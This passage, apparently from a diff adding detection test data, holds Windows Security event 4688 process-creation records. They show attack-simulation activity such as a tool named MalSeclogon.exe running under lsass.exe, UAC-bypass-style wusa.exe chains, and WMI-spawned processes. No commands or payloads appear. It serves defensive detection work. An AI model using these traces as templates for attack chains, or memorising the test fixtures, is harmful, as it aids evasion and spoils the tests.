+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:06.656542Z"">
+    </TimeCreated>
+    <EventRecordID>21374</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""9832"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">WIND10$</Data>
+    <Data Name=""SubjectDomainName"">WINLAB</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""NewProcessId"">0x1dc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe8c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.904945Z"">
+    </TimeCreated>
+    <EventRecordID>18208</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x8dc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x188</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.889320Z"">
+    </TimeCreated>
+    <EventRecordID>18207</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xc74</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x4f0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.826820Z"">
+    </TimeCreated>
+    <EventRecordID>18205</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x5b0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wusa.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x4f0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.795570Z"">
+    </TimeCreated>
+    <EventRecordID>18204</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x27c</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x258</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.748695Z"">
+    </TimeCreated>
+    <EventRecordID>18201</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xec8</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x258</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.623695Z"">
+    </TimeCreated>
+    <EventRecordID>18198</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x7f0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\consent.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x3c8</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.608070Z"">
+    </TimeCreated>
+    <EventRecordID>18197</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x13765</Data>
+    <Data Name=""NewProcessId"">0x628</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wusa.exe</Data>
+    <Data Name=""TokenElevationType"">%%1938</Data>
+    <Data Name=""ProcessId"">0x4f0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.342445Z"">
+    </TimeCreated>
+    <EventRecordID>18196</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x13765</Data>
+    <Data Name=""NewProcessId"">0x4f0</Data>
+    <Data Name=""NewProcessName"">C:\Python27\python.exe</Data>
+    <Data Name=""TokenElevationType"">%%1938</Data>
+    <Data Name=""ProcessId"">0x12c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-18T15:06:46.345209+04:00,1552907206.345209,4688,C:\Windows\System32\dllhost.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T11:06:46.305152Z"">
+    </TimeCreated>
+    <EventRecordID>433078</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""48"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xf6c</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x278</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\conhost.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T11:06:29.961651Z"">
+    </TimeCreated>
+    <EventRecordID>432906</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""48"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x370</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x764</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\cmd.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T11:06:29.911579Z"">
+    </TimeCreated>
+    <EventRecordID>432905</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""48"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x440</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x448</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-19T02:16:09.458302+04:00,1552947369.458302,4688,C:\Windows\System32\calc.exe,WIN-77LTAPHIQ1R$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:49.676748Z"">
+    </TimeCreated>
+    <EventRecordID>563299</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""3696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""NewProcessId"">0x424</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xae8</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-19T02:15:49.692401+04:00,1552947349.692401,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:49.645889Z"">
+    </TimeCreated>
+    <EventRecordID>563298</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""3696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xae8</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
